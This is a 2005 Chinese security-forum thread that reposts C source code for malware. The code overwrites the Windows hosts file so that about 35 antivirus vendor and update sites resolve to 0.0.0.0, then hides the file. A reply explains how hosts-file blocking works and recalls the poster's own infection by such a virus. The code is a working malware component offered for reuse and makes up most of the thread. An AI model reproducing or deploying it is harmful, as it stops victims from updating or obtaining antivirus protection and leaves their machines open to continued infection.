邪恶八进制信息安全团队技术讨论组 » 开源代码收集{ Software Source Code } » [转载]简单方法屏蔽用户访问反毒网站代码 [查看完整版本]

金州 2005-12-19 02:30

[转载]简单方法屏蔽用户访问反毒网站代码

文章作者：vxk

void block_av()
{
  char str[MAX_PATH];
  int n;

  char *sites[] =
  {
  "[url]www.antivirus.com[/url]",
  "[url]www.claymania.com[/url]",
  "[url]www.free-av.com[/url]",
  "[url]www.bitdefender.com[/url]",
  "[url]www.commandcom.com[/url]",
  "[url]www.dials.ru[/url]",
  "www1.my-etrust.com",
  "[url]www.f-prot.com[/url]",
  "[url]www.f-secure.com[/url]",
  "[url]www.grisoft.com[/url]",
  "antivirus.cai.com",
  "[url]www.avp.ru[/url]",
  "[url]www.nai.com[/url]",
  "[url]www.nod32.com.au[/url]",
  "[url]www.norman.com[/url]",
  "[url]www.symantec.com[/url]",
  "[url]www.pandasoftware.com[/url]",
  "[url]www.sophos.com[/url]",
  "[url]www.trend.com[/url]",
  "[url]www.commandondemand.com[/url]",
  "[url]www.dialognauka.ru[/url]",
  "[url]www.veloz.com[/url]",
  "support.ikarus.at",
  "[url]www.kaspersky.com[/url]",
  "[url]www.hauri.net[/url]",
  "antivirus.mafia.ru",
  "[url]www.mcafee.com[/url]",
  "[url]www.webimmune.net[/url]",
  "[url]www.pandasoftware.com[/url]",
  "[url]www.pcpitstop.com[/url]",
  "[url]www.ravantivirus.com[/url]",
  "security1.norton.com",
  "housecall.antivirus.com",
  "[url]www.freedom.net[/url]",
  "[url]www.invircible.com[/url]"
  };

  FILE *hosts = fopen(hosts_file(), "w");

  if (hosts == NULL)
     return;

  fputs("127.0.0.1 localhost\n", hosts);

  for (n = 0; n <= MAX_SITES; n++)
  {
     wsprintf(str, "0.0.0.0 %s\n", sites[n]);
     fputs(str, hosts);
  }

  fclose(hosts);

  SetFileAttributes(hosts_file(), FILE_ATTRIBUTE_HIDDEN);
}

char *hosts_file()
{
  static char hosts[MAX_PATH];

  if (running_nt())
     wsprintf(hosts, "%s\\drivers\\etc\\hosts", sysdir());

  else
     wsprintf(hosts, "%s\\hosts", windir());

  return hosts;
}

BOOL running_nt()
{
  return (GetVersion() < 0x80000000);
}

char *windir()
{
  static char win[MAX_PATH];

  GetSystemDirectory(win, MAX_PATH);

  return win;
}

金州 2005-12-19 02:41

其实道理很简单，就是加入host屏蔽，为了一些才喜欢电脑的新的朋友的理解，我把关于host屏蔽简单说一下。
原理：Hosts的请求级别比DNS高。Hosts文件中存在这个网址的IP地址映射的话，浏览器就是直接访问这个IP地址，而不去请求DNS解析了。
位置：Windows 98和me系统下，hosts文件在Windows\目录
Windows 2000/XP系统中位于Winnt(windows)\System32\Drivers\Etc目录中
Hosts文件没有后缀名，不过用记事本就能打开。
方法：127.0.0.1 www.？？？.com

用一句通俗的话解释，电脑会错误的把127.0.0.1你自己的检测地址当成后面网站的域名解析，当然就找不到了 。
主贴很简单，之所以转过来，是因为我才开始知到电脑就中过包含有这种代码的病毒，杀毒无法升级。哈哈，后来找了一个能跳转的网站在线杀毒杀掉了，想想有一点生气。当时还不懂得host这么简单的问题。

查看完整版本: [转载]简单方法屏蔽用户访问反毒网站代码

© 1999-2008 EvilOctal Security Team